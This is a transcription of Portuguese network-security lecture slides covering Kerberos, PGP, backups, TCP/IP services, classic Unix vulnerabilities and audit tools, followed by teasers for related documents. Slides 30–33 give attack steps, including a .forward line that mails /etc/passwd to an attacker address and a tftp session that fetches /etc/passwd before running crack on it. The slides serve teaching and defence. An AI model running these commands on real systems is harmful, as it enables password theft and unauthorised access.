Mecanismos de Defesa. Criptografia. Aplicações Kerberos - situação após login

Tamanho: px
Começar a partir da página:

Download "Mecanismos de Defesa. Criptografia. Aplicações Kerberos - situação após login"

Transcrição

1 Mecanismos de Defesa Criptografia Aplicações Kerberos - situação após login cliente possui TCT e chave de sessão TCT criptografado com senha conhecida por AS e ST. Ninguém altera TCT TCT contém : ID do usuário e do servidor de aplicação tempo de vida (8horas) para o TCT cópia da chave de sessão o TCT usado para obter tickets de serviço evita pedir senha ao usuário com frequência

2 Mecanismos de Defesa Criptografia Aplicações Kerberos - como obter um ticket de serviço cliente envia pedido de ticket para o ST, enviando TCT ST decriptografa TCT e verifica tempo de vida, user ID e endereço (devem bater com TCT) para evitar roubo do TCT quando passa na rede (durante o tempo de vida), cliente envia autenticador criptografado com a chave de sessão (que só ele e o ST possuem) com curtissimo tempo de vida

3 Mecanismos de Defesa Criptografia Aplicações Kerberos - como obter o serviço ST envia um ticket de serviço e nova chave de sessão para o cliente a mensagem criptografada com chave de sessão antiga (só o cliente pode pegar) novo ticket criptogrado com chave conhecida pelo ST e pelo servidor de aplicação esse ticket pode ser reusado novo ticket + autenticador enviados para o servidor de aplicação criptogrado com a nova chave de sessão

4 Mecanismos de Defesa Criptografia Aplicações correio eletrônico seguro Efetivamente existem dois sistemas de correio seguro em funcionamento PEM (Privacy Enhanced Mail) desenvolvido pela comunidade Internet e documentado nos RFCs 1421 a 1424 PGP (pretty Good Privacy) desenvolvido por Phil Zimmerman (guerilla freeware) Ambos utilizam chaves públicas (RSA) para autenticar remetentes, embora implementam seu suporte de maneiras diferentes

5 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) funções básicas cifrar dados decifrar dados gerar assinatura digital para envio de dados verificar autenticidade de assinatura digital no recebimento

6 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) ceriticação de chaves/assinatura digital estrutura não-hierárquica - uso um grafo arbitrário de confiança usuários recebem listas de chaves de outros usuários, e os guarda em chaveiros, indicando o grau de confiança no fiador usa o algoritmo RSA com chave pública assinatura é a criptografia de um hash code da mensagem (128 bits) hash code gerado usando MD5

7 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) uso de criptografia IDEA usado para cifrar corpos de mensagens RSA usado para cifrar chaves e certificados MD5 usado para hash mensagens antes de assinatura

8 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) sequência normal cria-se um par de chaves: uma secreta e uma pública distribui-se a chave pública gera mensagem original cifragem com chave secreta somente do sumário matemático do texto plano assina (MD5/RSA) comprime resultado (mensagem + assinatura) criptografa com IDEA e chave simétrica criptografa chave simétrica com RSA envia mensagem assinada e criptografada com a chave simétrica

9 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) sequência normal criptografa chave simétrica com RSA envia mensagem assinada e criptografada com a chave simétrica criptografada se a decifragem do sumário matemático comparada com o texto plano e a comparação de assinaturas não certificar a mensagem, ou a mensagem não provém do dono da chave pública, ou foi alterada, ou foi forjada

10 Segurança de Sistemas Backups Bugs, acidentes, desastres naturais e ataques podem ocorrer aos sistemas e muitas vezes não podem ser evitados, apesar dos esforços. No entanto, se você possui cópias, você pode comparar a versão atual do sistema com a cópia e então recuperar o sistema para um estado estável

11 Segurança de Sistemas Backups Tipos Cópia inicial -->> na intalação do sistema, antes que as pessoas comecem a usá-lo, é feita uma cópia de todos os arquivos e programas. Cópia completa -->> copia tudo para o dispositivo de backup, de forma regular Cópia complementar -->> copia apenas aqueles itens que foram modificados para o dispositivo de backup

12 Segurança de Sistemas Backups Fatores que determinam a estratégia : capacidade de memória disponível no sistema tipo de dispositivo de backup utilizado importância dos dados qanto tempo e dinheiro estão disponíveis para conduzir o backup frequência de uso esperado dos arquivos de backup Ferramentas para realizar backups cópias simples locais (cp, dd), cópias de arquivos (tar), programas especializados (dump/restore), cópias pela rede (rdump/rrestore, rcp, ftp, rdist)

13 Fundamentos do TCP/IP O termo TCP/IP refere-se: a um conjunto de protocolos de comunicação de dados ao nome dos dois protocolos mais importantes desse conjunto de protocolos: Transmission Control Protocol (TCP) Internet Protocol (IP) Características do TCP/IP padrões abertos, implementado por várias arquiteturas de hardware (plataformas) e software (sistemas operacionais)

14 Fundamentos do TCP/IP Características do TCP/IP independência de hardware específico de rede (ethernet, token-ring, dial-up line, X.25 etc) esquema de endereçamento robusto e flexível protocolos de alto nível padronizados para os serviços do usuário (ftp, telnet etc)

15 Processo usuário Processo usuário Camadas OSI 5-7 TCP UDP Camada OSI 4 ICMP IP ARP RARP Camada OSI 3 Interface de Hardware Camadas OSI 1-2

16 Serviços TCP/IP processos clientes X processos servidores existem dois tipos de processos servidores (daemons) : aqueles que estão sempre rodando aqueles que rodam somente quando solicitados clientes são criados assincronamente conexões são identificadas por : IP de origem, porta de origem, IP de destino, porta de destino portas de origem são alocadas dinamicamente alguns serviços possuem portas bem conhecidas (well known ports)

17 Serviços TCP/IP serviços básicos systat (porta TCP 11) -->> fornece informações de status de um host para outros hosts na rede (recomendável desabilitá-lo) FTP (portas TCP 20 e 21) -->> possibilita transferência completa de arquivos entre sistemas (recomendável o uso alternativo de protocolos de autenticação) TELNET (porta TCP 23) -->> possibilita o acesso a computadores remotos na rede (recomendável o uso de criptografia e senhas de uso único)

18 Serviços TCP/IP serviços básicos SMTP (correio eletrônico - porta TCP 25) -->> permite a transferência de mensagens entre computadores (recomendável o uso da versão 8 e posteriores do programa sendmail) TACACS (porta UDP 49) -->> usado para autenticar logins em servidores de terminais (senhas não estão criptografadas e estão portanto sujeitas a sniffing ) DNS (portas TCP e UDP 53) -->> base de dados distribuída que permite mapear endereços IP em nomes de máquinas e vice-versa (recomendável rodar o servidor de nomes em máquina especial sem usuários comuns)

19 Serviços TCP/IP serviços básicos TFTP (porta UDP 69) -->> possibilita transferência de arquivo baseada no protocolo UDP e não oferece segurança (não é recomendável a habilitação do serviço) finger (porta TCP 79) -->> permite obter informação detalhada (nome completo, localização, tempo de login, telefone etc) sobre usuários de um sistema (revela informações que podem ser usadas em ataques do tipo engenharia social)

20 Serviços TCP/IP serviços básicos HTTP (porta TCP 80) -->> usado para solicitar e receber documentos de servidores WWW (recomendável a instalação/configuração de servidores seguros) POP (portas TCP 109 e 110) -->> permite aos usuários a recuperação de correio eletrônico. (recomendável o uso de versões cujos cliente e servidor POP sejam suportados por sistemas de autenticação)

21 Serviços TCP/IP serviços básicos X window System (portas TCP ) -->> sistema de janelas baseado em rede que permite que diferentes máquinas possam ter como saída um único display. Cada device gráfico é controlado por um XWindows server. Xterm é um cliente xhosts controla o acesso ao display xhost só impede futuras conexões, não interferindo nas que já estão ativas. Possibilidade de monitorar o mouse e teclado.

22 Serviços TCP/IP serviços básicos RIP (Routing Internet Protocol) (porta UDP 520) -->> implementa protocolo de roteamento, distribuindo informações sobre novas redes e roteadores PROBLEMA: Propagação de pacotes RIP (Routing Information Protocol) falsos. Implicação: Hosts e roteadores geralmente acreditam neles. Se a máquina atacante está próximo do alvo é fácil subverter o tráfego.

23 Serviços TCP/IP serviços básicos RIP (Routing Internet Protocol) (porta UDP 520) Intruso A Y RIP X B Intruso propagando tabelas de roteamento para subverter o tráfego

24 Serviços TCP/IP serviços básicos RIP (Routing Internet Protocol) (porta UDP 520) Intruso A Y X B Intruso, após subverter o tráfego

25 Principais vulnerabilidades Furos de segurança na internet a workstation local é o ponto de entrada do penetra (hacker, cracker, attacker) a segurança local é ponto chave para a segurnaça mais global exemplos que seguem são baseados em workstations UNIX por serem mais comuns na Internet

26 Principais vulnerabilidades Furos de segurança na internet Furo 1 : conta root cuidado com a conta root só use em caso de necessidade cuidado com a senha do root mudanças frequentes cadastre terminais seguros para fazer login como root

27 Principais vulnerabilidades Furos de segurança na internet Furo 2 : outras contas náo permitir contas sem senhas treinar usuários em escolher senhas limitar tempo de vida das contas habilitar verificação de senhas seguras e envelhecimento de senhas usar shadow passwords tentar quebrar senhas

28 Principais vulnerabilidades Furos de segurança na internet Furo 3 : finger se tiver pouca gente no ar, é hora de entrar!!! Com outras chamadas a finger, pode descobrir : nomes de login, diretórios HOME, shell, último login, último host de login tudo isso é informação valiosa para o hacker!!!

29 Principais vulnerabilidades Furos de segurança na internet Furo 4 : trusted hosts /etc/hosts.equiv e ~/.rhosts são perigosos!! Permitem fazer rsh, rlogin,..., sem senha trusted hosts devem realmente sê-lo?? Você deve conhecer quem administra essas máquinas e confiar nessas pessoas e na política de segurança controle os ~/.rhosts com cuidado!

30 Principais vulnerabilidades Furos de segurança na internet Furo 5 : showmount showmount -e vitima.com.br mostra sistemas de arquivos exportados se descobrir um diretório de login de alguém abaixo de um sistema exportado para todos, pode criar um ~/.rhosts nesse diretório e fazer login remoto com facilidade se um sistema exportado contiver /usr ou /usr/local/bin, pode instalar cavalos de tróia

31 Principais vulnerabilidades Furos de segurança na internet Furo 6 : anonymous FTP ~ftp/etc/passwd frequentemente contém o arquivo completo de senhas. Pode examinar à vontade se diretório ~ftp permitir gravação, coloque a seguinte linha em ~ftp/.forward : /bin/mail hacker@mal.com.br </etc/passwd e envie um mail qualquer para ftp@vitima.com.br

32 Principais vulnerabilidades Furos de segurança na internet Furo 7 : TFTP não requer identificação ou senha permite transferir qualquer arquivo NÃO USE, a não ser que : tenha opção segura (restringe a um diretório) o ataque %tftp tftp> connect vitima.com.br tftp> get /etc/passwd /tmp/f/passwd tftp> quit %crack < /tmp/f/passwd > /tmp/f/pass.facil

33 Principais vulnerabilidades Furos de segurança na internet Furo 8 : rpcinfo pode ser usado para descobrir muita informação valiosa rpcinfo -p vitima.com.br se NIS está rodando se NIS é mestre ou escravo se tem estações diskless (para obter domínios NIS com o comando bootparam) se tem NFS rodando se tem rusersd, rstatd, rexd(rsh sem senha!)

34 Principais vulnerabilidades Furos de segurança na internet Furo 9 : NIS sabendo o nome do domínio NIS, pode pegar todos os mapas do servidor NIS, incluindo : senhas mail aliases é difícil proteger NIS porque tem pouca autenticação não use, se possível

35 Principais vulnerabilidades Furos de segurança na internet Furo 9 : NIS Enganando o NIS server NIS RPC Request NIS Cliente Falso Reply RPC Reply Server Intruso

36 Principais vulnerabilidades Furos de segurança na internet Furo 10 : X-Window se não protegido, pode ser usado para ver telas dos outros computadores capturar teclado de outros computadores

37 Principais vulnerabilidades Como Reconhecer uma Invasão Observe sintomas suspeitos, como: Crash do sistema Contas novas ou antigas com atividade não usual Novos arquivos com nomes estranhos (..^d,... ), geralmente em /tmp Alteração no tamanho de arquivos

38 Principais vulnerabilidades Como Reconhecer uma Invasão Sintomas de alteração nos Logs do sistema (lastlog) Tentativa de escrita em arquivos/diretórios proibidos Access denied sem motivo aparente Performance inexplicavelmente baixa

39 Principais vulnerabilidades Como Reconhecer uma Invasão Tentativas de acesso não sucedidas Logins freqüentes em horário não costumeiro Alteração nas datas dos arquivos de configuração do sistema. Logins sucedidos a partir de locais desconhecidos

40 Principais vulnerabilidades Reagindo em Emergências Quando ocorre algum problema de segurança, há algumas medidas padrões a serem tomadas: Identifique e entenda o problema Contenha ou pare os danos Confirme suas suspeitas e determine os estragos

41 Principais vulnerabilidades Reagindo em Emergências Restaure seu sistema Trate da causa dos problemas Faça um relatório da ocorrência. Controle os boatos, dê esclarecimentos se necessário. Isto é especialmente importante, pois geralmente os rumores vão prejudicar mais que o próprio problema.

42 Principais vulnerabilidades Reagindo em Emergências Computer Emergency Response Team Coordination Center - CERT-CC Criado inicialmente pela DARPA (Defense Advanced Research Projects Agency) para tratar incidentes como o do verme de O CERT monitora segurança de computadores e atividades de quebras de sistemas, alertando os usuários tml ftp://info.cert.org cert@cert.org.

43 Principais vulnerabilidades Reagindo em Emergências Forum of Incident and Response Security Teams - FIRST Reunião de diferentes grupos de resposta a incidentes (inclusive o CERT-CC) Realiza workshop anual first-sec@first.org.

44 Principais vulnerabilidades Reagindo em Emergências Centro de Atendimento a Incidentes de Segurança - CAIS lançamento oficial - Dezembro de missão institucional promover a cultura e disseminação do conhecimento na área de segurança em redes diminuir o número de incidentes de segurança que podem afetar diretamente o backbone da RNP diminuir a magnitude dos danos causados por tais incidentes

45 Ferramentas para verificação de segurança Monitoramento TCPDUMP Disponível para monitoração do tráfego da rede ftp://ftp.ee.lbl.gov/tcpdump2.2.1.tar.z TRACEROUTE Determina o caminho para um determinado destino ftp://ftp.ee.lbl.gov/traceroute.tar.z SNMP Muitas informações podem ser obtidas através dele, especialmente de roteadores Várias implementações disponíveis: CMU-SNMP ftp:/ftp.net.cmu.edu/pub/snmp-dist Scotty/Tkined (TU Braunschweig)

46 Ferramentas para verificação de segurança Auditoria COPS (Computer Oracle and Password System) Procura por erros de configurações no sistema Unix, inclusive o NOS (Network Operating System). Verifica modos/permissões de arquivos Fragilidade de Passwords Consistência do /etc/passwd (entradas duplicadas) Verifica.rhosts,.profile,.cshrc,.forward, e outros nos diretórios home dos usuários

47 Ferramentas para verificação de segurança Auditoria COPS (Computer Oracle and Password System) Verifica arquivos com SUID de root setados CRC de arquivos binários importantes Configuração do anonymous Ftp Restrições ao Tftp, decode alias no sendmail, inetd.conf Outras checagens ( + no hosts.equiv, mount filesystems) Datas de arquivos binários ftp://ftp.cert.org/pub/tools/cops

48 Ferramentas para verificação de segurança Auditoria CRACK Usado para testar as passwords dos usuários Testa vários dicionários, inclusive os que você fornecer Escolhe passwords a serem testadas a partir do /etc/passwd,.plan e.project. Possui arquivos de configurações permitindo testar várias mutações sobre os dicionários fornecidos. ftp://ftp.cert.org/pub/tools/crack ftp://black.ox.ac.uk/wordlists TAMU tiger Conjunto de scripts que procuram por vulnerabilidades em sistemas Unix. Similar ao TRIPWIRE. ftp://net.tamu.edu/pub/security/tamu

49 Ferramentas para verificação de segurança Auditoria TRIPWIRE É um monitor de integridade para sistemas Unix Usa diversas rotinas de chksum/ message-digest/ secure-hash/ signature, visando detectar alterações nos arquivos, bem como monitorar informações mantidas pelo sistema A configuração do Tripwire permite especificar arquivos e diretórios a serem monitorados ou não e a especificar arquivos onde alterações limitadas são permitidas sem gerar alerta

Segurança na Internet

Segurança na Internet Março de 1998 Ari Frazão Jr. PAL0088 Índice: Parte A: Introdução Parte B: Situação Atual Parte C: Política de Segurança Parte D: Classificação dos Ataques Parte E: Ataques Mais Freqüentes Parte F: Vulnerabilidades

Leia mais

NORMAS PARA O USO DE SISTEMA DE PROTEÇÃO FIREWALL DE PERÍMETRO NO ÂMBITO DA REDE INFOVIA-MT

NORMAS PARA O USO DE SISTEMA DE PROTEÇÃO FIREWALL DE PERÍMETRO NO ÂMBITO DA REDE INFOVIA-MT CONSELHO SUPERIOR DO SISTEMA ESTADUAL DE E TECNOLOGIA DA NORMAS PARA O USO DE SISTEMA DE PROTEÇÃO FIREWALL DE PERÍMETRO NO ÂMBITO DA REDE INFOVIA-MT 1/10 CONSELHO SUPERIOR DO SISTEMA ESTADUAL DE E TECNOLOGIA

Leia mais

Redes de Computadores. 1 Questões de múltipla escolha. TE090 - Prof. Pedroso. 17 de junho de 2015

Redes de Computadores. 1 Questões de múltipla escolha. TE090 - Prof. Pedroso. 17 de junho de 2015 TE090 - Prof. Pedroso 17 de junho de 2015 1 Questões de múltipla escolha Exercício 1: Suponha que um roteador foi configurado para descobrir rotas utilizando o protocolo RIP (Routing Information Protocol),

Leia mais

Davidson Rodrigo Boccardo flitzdavidson@gmail.com

Davidson Rodrigo Boccardo flitzdavidson@gmail.com Segurança em Sistemas de Computação Davidson Rodrigo Boccardo flitzdavidson@gmail.com Segurança Segurança deve considerar o ambiente externo do sistema, e proteger de: Acesso não autorizado Alteração ou

Leia mais

REDES DE COMPUTADORES

REDES DE COMPUTADORES REDES DE COMPUTADORES 09/2013 Cap.3 Protocolo TCP e a Camada de Transporte 2 Esclarecimentos Esse material é de apoio para as aulas da disciplina e não substitui a leitura da bibliografia básica. Os professores

Leia mais

REDES DE COMPUTADORES

REDES DE COMPUTADORES REDES DE COMPUTADORES Prof. Esp. Fabiano Taguchi http://fabianotaguchi.wordpress.com fabianotaguchi@gmail.com ENLACE X REDE A camada de enlace efetua de forma eficiente e com controle de erros o envio

Leia mais

Redes de Computadores II

Redes de Computadores II Redes de Computadores II UDP Prof: Ricardo Luís R. Peres Tem como objetivo prover uma comunicação entre dois processos de uma mesma sessão que estejam rodando em computadores dentro da mesma rede ou não.

Leia mais

O processo de Navegação na Internet APRESENTAÇÃO DO CURSO. Prof. BRUNO GUILHEN. O Internet Explorer. www.brunoguilhen.com.br 1 INFORMÁTICA BÁSICA

O processo de Navegação na Internet APRESENTAÇÃO DO CURSO. Prof. BRUNO GUILHEN. O Internet Explorer. www.brunoguilhen.com.br 1 INFORMÁTICA BÁSICA APRESENTAÇÃO DO CURSO Prof. BRUNO GUILHEN O processo de Navegação na Internet INFORMÁTICA BÁSICA A NAVEGAÇÃO Programas de Navegação ou Browser : Internet Explorer; O Internet Explorer Netscape Navigator;

Leia mais

Módulo de Transmissão e Ativos de Rede Curso Técnico de Informática. Prof. George Silva

Módulo de Transmissão e Ativos de Rede Curso Técnico de Informática. Prof. George Silva Módulo de Transmissão e Ativos de Rede Curso Técnico de Informática Prof. George Silva FTIN FORMAÇÃO TÉCNICA EM INFORMÁTICA COMPONENTES ATIVOS DE REDES AULA 04 Objetivo Entender o encapsulamento de dados

Leia mais

Segurança de Rede Prof. João Bosco M. Sobral 1

Segurança de Rede Prof. João Bosco M. Sobral 1 1 Sinopse do capítulo Problemas de segurança para o campus. Soluções de segurança. Protegendo os dispositivos físicos. Protegendo a interface administrativa. Protegendo a comunicação entre roteadores.

Leia mais

Prof. Marcelo Cunha Parte 5 www.marcelomachado.com

Prof. Marcelo Cunha Parte 5 www.marcelomachado.com Prof. Marcelo Cunha Parte 5 www.marcelomachado.com Criado em 1974 Protocolo mais utilizado em redes locais Protocolo utilizado na Internet Possui arquitetura aberta Qualquer fabricante pode adotar a sua

Leia mais

Camada de Transporte, protocolos TCP e UDP

Camada de Transporte, protocolos TCP e UDP Camada de Transporte, protocolos TCP e UDP Conhecer o conceito da camada de transporte e seus principais protocolos: TCP e UDP. O principal objetivo da camada de transporte é oferecer um serviço confiável,

Leia mais

Redes de Computadores. Protocolo TCP/IP Profa. Priscila Solís Barreto

Redes de Computadores. Protocolo TCP/IP Profa. Priscila Solís Barreto Redes de Computadores Protocolo TCP/IP Profa. Priscila Solís Barreto Internet G G G Introdução Protocolo: Conjunto de regras que determinam como o hardware e o software de uma rede devem interagir para

Leia mais

Projeto de Redes de Computadores. Desenvolvimento de Estratégias de Segurança e Gerência

Projeto de Redes de Computadores. Desenvolvimento de Estratégias de Segurança e Gerência Desenvolvimento de Estratégias de Segurança e Gerência Segurança e Gerência são aspectos importantes do projeto lógico de uma rede São freqüentemente esquecidos por projetistas por serem consideradas questões

Leia mais

MÓDULO I - INTERNET APRESENTAÇÃO DO CURSO. Prof. BRUNO GUILHEN. Prof. BRUNO GUILHEN. O processo de Navegação na Internet. Aula 01

MÓDULO I - INTERNET APRESENTAÇÃO DO CURSO. Prof. BRUNO GUILHEN. Prof. BRUNO GUILHEN. O processo de Navegação na Internet. Aula 01 APRESENTAÇÃO DO CURSO Prof. BRUNO GUILHEN Prof. BRUNO GUILHEN MÓDULO I - INTERNET O processo de Navegação na Internet Aula 01 O processo de Navegação na Internet. USUÁRIO A CONEXÃO PROVEDOR On-Line EMPRESA

Leia mais

MÓDULO 8 Modelo de Referência TCP/IP

MÓDULO 8 Modelo de Referência TCP/IP MÓDULO 8 Modelo de Referência TCP/IP A internet é conhecida como uma rede pública de comunicação de dados com o controle totalmente descentralizado, utiliza para isso um conjunto de protocolos TCP e IP,

Leia mais

TCP/IP TCP UDP IP HTTP HTTPS FTP TFTP TELNET POP3 IMAP SMTP SNMP DHCP

TCP/IP TCP UDP IP HTTP HTTPS FTP TFTP TELNET POP3 IMAP SMTP SNMP DHCP TCP/IP TCP UDP IP HTTP HTTPS FTP TFTP TELNET POP3 IMAP SMTP SNMP DHCP HTTP (Hypertext Transfer Protocol ) Protocolo usado na Internet para transferir as páginas da WWW (WEB). HTTPS (HyperText Transfer

Leia mais

ADDRESS RESOLUTION PROTOCOL. Thiago de Almeida Correia

ADDRESS RESOLUTION PROTOCOL. Thiago de Almeida Correia ADDRESS RESOLUTION PROTOCOL Thiago de Almeida Correia São Paulo 2011 1. Visão Geral Em uma rede de computadores local, os hosts se enxergam através de dois endereços, sendo um deles o endereço Internet

Leia mais

Segurança Internet. Fernando Albuquerque. fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589

Segurança Internet. Fernando Albuquerque. fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589 Segurança Internet Fernando Albuquerque fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589 Tópicos Introdução Autenticação Controle da configuração Registro dos acessos Firewalls Backups

Leia mais

1 Redes de Computadores - TCP/IP Luiz Arthur

1 Redes de Computadores - TCP/IP Luiz Arthur 1 Redes de Computadores - TCP/IP Luiz Arthur TCP/IP O protocolo TCP/IP atualmente é o protocolo mais usado no mundo. Isso se deve a popularização da Internet, a rede mundial de computadores, já que esse

Leia mais

No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano.

No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano. No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano. Essa estratégia foi deixada para trás. Atualmente, o software de rede é altamente

Leia mais

REDE DE COMPUTADORES

REDE DE COMPUTADORES SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL REDE DE COMPUTADORES camadas do Modelo de Referência ISO/OSI Pilha de Protocolos TCP Prof. Airton Ribeiro de Sousa E-mail: airton.ribeiros@gmail.com 1 Camadas

Leia mais

Modelos de Camadas. Professor Leonardo Larback

Modelos de Camadas. Professor Leonardo Larback Modelos de Camadas Professor Leonardo Larback Modelo OSI Quando surgiram, as redes de computadores eram, em sua totalidade, proprietárias, isto é, uma determinada tecnologia era suportada apenas por seu

Leia mais

Disciplina de Redes de Computadores Estudo Dirigido para a Prova II Professor Dr Windson Viana de Carvalho

Disciplina de Redes de Computadores Estudo Dirigido para a Prova II Professor Dr Windson Viana de Carvalho Disciplina de Redes de Computadores Estudo Dirigido para a Prova II Professor Dr Windson Viana de Carvalho Obs: Não há necessidade de entregar a lista Questões do livro base (Kurose) Questões Problemas

Leia mais

Redes de Computadores. Prof. André Y. Kusumoto andre_unip@kusumoto.com.br

Redes de Computadores. Prof. André Y. Kusumoto andre_unip@kusumoto.com.br Redes de Computadores Prof. André Y. Kusumoto andre_unip@kusumoto.com.br Open Systems Interconnection Modelo OSI No início da utilização das redes de computadores, as tecnologias utilizadas para a comunicação

Leia mais

Fernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br

Fernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP Fernando Albuquerque 061-2733589 fernando@cic.unb.br Protocolos TCP/IP - Tópicos Introdução IP Endereçamento Roteamento UDP, TCP Telnet, FTP Correio DNS Web Firewalls Protocolos TCP/IP

Leia mais

Firewall. Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes. Campus Cachoeiro Curso Técnico em Informática

Firewall. Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes. Campus Cachoeiro Curso Técnico em Informática Firewall Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes Campus Cachoeiro Curso Técnico em Informática Firewall (definições) Por que do nome firewall? Antigamente, quando as casas

Leia mais

Capítulo 1 PROTOCOLOS FUNDAMENTAIS DA INTERNET

Capítulo 1 PROTOCOLOS FUNDAMENTAIS DA INTERNET Capítulo 1 PROTOCOLOS FUNDAMENTAIS DA INTERNET protocolos TCP/IP são um conjunto de standards que permitem que computadores de todas marcas e feitios comuniquem entre si Algumas datas históricas: 1968

Leia mais

INTERNET = ARQUITETURA TCP/IP

INTERNET = ARQUITETURA TCP/IP Arquitetura TCP/IP Arquitetura TCP/IP INTERNET = ARQUITETURA TCP/IP gatewa y internet internet REDE REDE REDE REDE Arquitetura TCP/IP (Resumo) É útil conhecer os dois modelos de rede TCP/IP e OSI. Cada

Leia mais

A mensagem é quebrada em pacotes, e cada pacote pode trafegar por diversos caminhos diferentes POP3 e SMTP trafegam informação em texto claro Nos EUA

A mensagem é quebrada em pacotes, e cada pacote pode trafegar por diversos caminhos diferentes POP3 e SMTP trafegam informação em texto claro Nos EUA Segurança em Comunicações Segurança de E-Mail Carlos Sampaio Segurança de E-Mail: E-Mail Clássico A mensagem é quebrada em pacotes, e cada pacote pode trafegar por diversos caminhos diferentes POP3 e SMTP

Leia mais

Prof. Samuel Henrique Bucke Brito

Prof. Samuel Henrique Bucke Brito - Arquitetura da Internet: TCP/IP www.labcisco.com.br ::: shbbrito@labcisco.com.br Prof. Samuel Henrique Bucke Brito Introdução Toda a estrutura atual da Internet está fundamentada na suíte de protocolos

Leia mais

3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança

3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança 3 SERVIÇOS IP 3.1 Serviços IP e alguns aspectos de segurança Os serviços IP's são suscetíveis a uma variedade de possíveis ataques, desde ataques passivos (como espionagem) até ataques ativos (como a impossibilidade

Leia mais

Hackers. Seus dados podem ser inúteis, mas seu computador em si pode ainda ser um recurso valioso.

Hackers. Seus dados podem ser inúteis, mas seu computador em si pode ainda ser um recurso valioso. Firewalls Hackers Gostam de alvos fáceis. Podem não estar interessados nas suas informações. Podem invadir seu computador apenas por diversão. Para treinar um ataque a uma máquina relativamente segura.

Leia mais

Professor: Gládston Duarte

Professor: Gládston Duarte Professor: Gládston Duarte INFRAESTRUTURA FÍSICA DE REDES DE COMPUTADORES Computador Instalação e configuração de Sistemas Operacionais Windows e Linux Arquiteturas físicas e lógicas de redes de computadores

Leia mais

Rede d s d e d Com o pu p t u ado d r o es Conceitos Básicos M d o e d los o de d Re R de d s:

Rede d s d e d Com o pu p t u ado d r o es Conceitos Básicos M d o e d los o de d Re R de d s: Tecnologia em Redes de Computadores Redes de Computadores Professor: André Sobral e-mail: alsobral@gmail.com Conceitos Básicos Modelos de Redes: O O conceito de camada é utilizado para descrever como ocorre

Leia mais

Segurança em Redes. <Nome> <Instituição> <e-mail>

Segurança em Redes. <Nome> <Instituição> <e-mail> Segurança em Redes Agenda Riscos Cuidados gerais a serem tomados Configurando o acesso Internet da sua casa Configurando uma rede Wi-Fi doméstica Cuidados: ao se conectar

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores Prof. Macêdo Firmino Princípios de Gerência de Redes Macêdo Firmino (IFRN) Redes de Computadores Maio de 2011 1 / 13 Introdução Foi mostrado que uma rede de computadores consiste

Leia mais

REDES DE COMPUTADORES Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com.br

REDES DE COMPUTADORES Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com.br - Aula 2 - MODELO DE REFERÊNCIA TCP (RM TCP) 1. INTRODUÇÃO O modelo de referência TCP, foi muito usado pela rede ARPANET, e atualmente usado pela sua sucessora, a Internet Mundial. A ARPANET é de grande

Leia mais

CAMADA DE TRANSPORTE

CAMADA DE TRANSPORTE Curso Técnico de Redes de Computadores Disciplina de Fundamentos de Rede CAMADA DE TRANSPORTE Professora: Juliana Cristina de Andrade E-mail: professora.julianacrstina@gmail.com Site: www.julianacristina.com

Leia mais

genérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes

genérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes FIREWALLS Firewalls Definição: Termo genérico utilizado para designar um tipo de proteção de rede que restringe o acesso a certos serviços de um computador ou rede de computadores pela filtragem dos pacotes

Leia mais

DoS: Negação de Serviço e formas de defesa

DoS: Negação de Serviço e formas de defesa DoS: Negação de Serviço e formas de defesa TchêLinux Ulbra Gravataí http://tchelinux.org/gravatai Elgio Schlemer Ulbra Gravatai http://gravatai.ulbra.tche.br/~elgio 31 de Maio de 2008 Introdução Problemas

Leia mais

Componentes de um sistema de firewall - I

Componentes de um sistema de firewall - I Componentes de um sistema de firewall - I O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um único elemento de software instalado num

Leia mais

FTP Protocolo de Transferência de Arquivos

FTP Protocolo de Transferência de Arquivos FTP Protocolo de Transferência de Arquivos IFSC UNIDADE DE SÃO JOSÉ CURSO TÉCNICO SUBSEQUENTE DE TELECOMUNICAÇÕES! Prof. Tomás Grimm FTP - Protocolo O protocolo FTP é o serviço padrão da Internet para

Leia mais

Servidor de E-mails e Protocolo SMTP

Servidor de E-mails e Protocolo SMTP Campus Cachoeiro Curso Técnico em Informática Servidor E-mails e Protocolo SMTP Professor: João Paulo Brito Gonçalves Disciplina: Serviços Res Definições Servidor Mensagens Um servidor mensagens é responsável

Leia mais

TECNOLOGIA WEB INTERNET PROTOCOLOS

TECNOLOGIA WEB INTERNET PROTOCOLOS INTERNET PROTOCOLOS 1 INTERNET Rede mundial de computadores. Também conhecida por Nuvem ou Teia. Uma rede que permite a comunicação de redes distintas entre os computadores conectados. Rede WAN Sistema

Leia mais

Redes de Computadores. Protocolos de comunicação: TCP, UDP

